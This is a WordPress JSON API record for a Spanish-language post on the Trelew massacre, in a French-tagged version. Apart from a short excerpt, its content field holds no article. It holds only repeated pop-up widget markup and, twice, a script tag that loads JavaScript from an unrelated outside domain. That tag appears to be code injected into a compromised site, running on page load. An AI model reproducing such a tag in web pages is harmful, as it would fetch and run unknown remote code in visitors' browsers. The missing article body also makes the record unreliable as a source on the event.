{"id":20686,"date":"2020-08-22T13:22:58","date_gmt":"2020-08-22T13:22:58","guid":{"rendered":"http:\/\/www.lapluma.net\/?p=20686"},"modified":"2020-08-22T13:27:04","modified_gmt":"2020-08-22T13:27:04","slug":"masacre-de-trelew-un-ensayo-previo-al-genocidio","status":"publish","type":"post","link":"https:\/\/www.lapluma.net\/fr\/2020\/08\/22\/masacre-de-trelew-un-ensayo-previo-al-genocidio\/","title":{"rendered":"Masacre de Trelew: un ensayo previo al genocidio"},"content":{"rendered":"<p>&nbsp;<\/p>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/p>\n<\/div>\n<\/div>\n<div><img \/><\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/div>\n<\/div>\n<div><img \/><\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Se cumplen 48 a\u00f1os de aquella masacre en el sur del pa\u00eds en la que fueron masacrados 16 militantes revolucionarios. Esta nota pretende dar una introducci\u00f3n al dossier que dedicamos en  este d\u00eda a uno de los sucesos m\u00e1s dolorosos en la historia de nuestro pa\u00eds.<\/p>\n","protected":false},"author":690,"featured_media":20693,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[217],"tags":[10452,10450,10451,10449,10443,10446,725,10447,10448],"coauthors":[10442],"class_list":["post-20686","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-abya-yala","tag-argentina-abya-yala","tag-carcel-de-rawson-argentina","tag-dictadura-de-alejandro-agustin-lanusse","tag-far-erp-montoneros","tag-heroes-de-trelew","tag-masacre-de-trelew-genocidio","tag-memoria-historica","tag-miguel-martinez-naon","tag-peronismo-izquierda-peronista"],"translation":{"provider":"WPGlobus","version":"2.12.2","language":"fr","enabled_languages":["es","fr"],"languages":{"es":{"title":true,"content":true,"excerpt":true},"fr":{"title":false,"content":true,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/20686","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/users\/690"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/comments?post=20686"}],"version-history":[{"count":4,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/20686\/revisions"}],"predecessor-version":[{"id":20752,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/20686\/revisions\/20752"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media\/20693"}],"wp:attachment":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media?parent=20686"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/categories?post=20686"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/tags?post=20686"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/coauthors?post=20686"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}